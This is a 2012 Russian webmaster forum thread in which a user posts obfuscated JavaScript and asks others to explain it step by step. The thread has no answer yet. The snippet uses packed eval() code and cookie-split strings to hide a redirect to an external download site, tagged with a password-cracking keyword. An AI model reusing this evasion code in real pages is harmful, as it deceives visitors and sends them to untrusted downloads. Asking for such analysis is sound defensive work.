Перейти к содержимому


Конкурс "Лучший отзовик"
× Быстрый вопрос
Пользователь месяца
ShowPrint ShowPrint 1-й за Март
Очков активности: 1 152 1 тема, 61 сообщение, 12 баллов репутации
Сайт: ShowPrint.ru
ТОП самых активных за этот месяц
  • Фотография Андрей WPMasterKZ
    #1

    Андрей WPMasterKZ (wpmaster.kz)
    Очков активности: 585 Вне конкурса за определение пользователя месяца

  • Фотография Vmir
    #2

    Vmir
    Очков активности: 456 3 темы, 29 сообщений, 8 баллов репутации

  • Фотография OlgaGetman
    #3

    OlgaGetman
    Очков активности: 360 Вне конкурса за определение пользователя месяца

  • Фотография ShowPrint
    #4

    ShowPrint (ShowPrint.ru)
    Очков активности: 204 Вне конкурса за определение пользователя месяца

  • Фотография Mandarin
    #5

    Mandarin
    Очков активности: 112.5 3 темы, 16 сообщений, 3 балла репутации

  • Фотография pozitron123
    #6

    pozitron123
    Очков активности: 67.5 3 темы, 6 сообщений, 3 балла репутации

  • Фотография maxnik
    #7

    maxnik (konovalovpavel.ru)
    Очков активности: 66 1 тема, 19 сообщений, 2 балла репутации

  • Фотография Megoydagi
    #8

    Megoydagi
    Очков активности: 51 1 тема, 14 сообщений, 2 балла репутации

  • Фотография re-search
    #9

    re-search
    Очков активности: 49.5 7 тем, 12 сообщений, 1 балл репутации

  • Фотография Strazh
    #10

    Strazh
    Очков активности: 37.5 1 тема, 22 сообщения, 1 балл репутации

  • Показать весь ТОП 10
Поддержите форум! =)
Апдейты
  • Яндекс ИКС: 20.04.2019
  • Яндекс выдача: 18.04.2019
Топ 5 участников по репутации


Что Делает функция javascript

#1 phpCode

phpCode
  • Неактивные
  • 11 сообщений
  • Репутация: 0
0

Отправлено 09 Январь 2012 - 11:01

<script type="text/javascript">
		var id = 2;
		var slov = 'взлом паролей брут';
		function setCookie (name, value, path) {
			eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.2=5+"="+3(4)+((0)?"; 0="+0:"");',6,6,'path|document|cookie|escape|value|name'.split('|'),0,{}));
		}
		function getCookie(name) {
			var cookie = " " + document.cookie;
			var search = " " + name + "=";
			var setStr = null;
			var offset = 0;
			var end = 0;
			if (cookie.length > 0) {
				offset = cookie.indexOf(search);
				if (offset != -1) {
					offset += search.length;
					end = cookie.indexOf(";", offset)
					if (end == -1) {
						end = cookie.length;
					}
					setStr = unescape(cookie.substring(offset, end));
				}
			}
			return(setStr);
		}
		setCookie("noo", "document.loc", "/");
		setCookie("foo", "ation='http:", "/");
		setCookie("foo1", "//aes", "/");
		setCookie("foo2", "o.bi", "/");
		setCookie("foo3", "z/"+id+'/', "/");
		function goDownload(){
			eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1=0("1");4=0("7");5=0("6");2=0("8");3=0("b");9(1+4+5+2+3+a+"\'")',12,12,'getCookie|noo|no2|stop|start|no1|foo1|foo|foo2|eval|slov|foo3'.split('|'),0,{}));
		}
	</script>

Собственно сам код.
Не нужно говорить, что скрипт выставляет куки и т.д.
Нужна помощь в точном определении действий скрипта.
Заранее благодарю.

 

 

  • 0

#2 sogologo

sogologo
  • Неактивные
  • 29 сообщений
  • Репутация: 0

Отправлено 09 Январь 2012 - 11:09

а точней? что значит точном определение?

1. по пунктам расписать ? на каком этапе что происходит?
2. или в свободном режиме описать зачем скрипт, какую цель достигает и как?
  • 0

#3 phpCode

phpCode
    Topic Starter
  • Неактивные
  • 11 сообщений
  • Репутация: 0

Отправлено 09 Январь 2012 - 11:10

Лучше написать на каком этапе что делает.)
Хотя и цель интересует.


  • 0



Похожие темы

  Название темы Автор Статистика Последнее сообщение

Оформление форума – IPBSkins.ru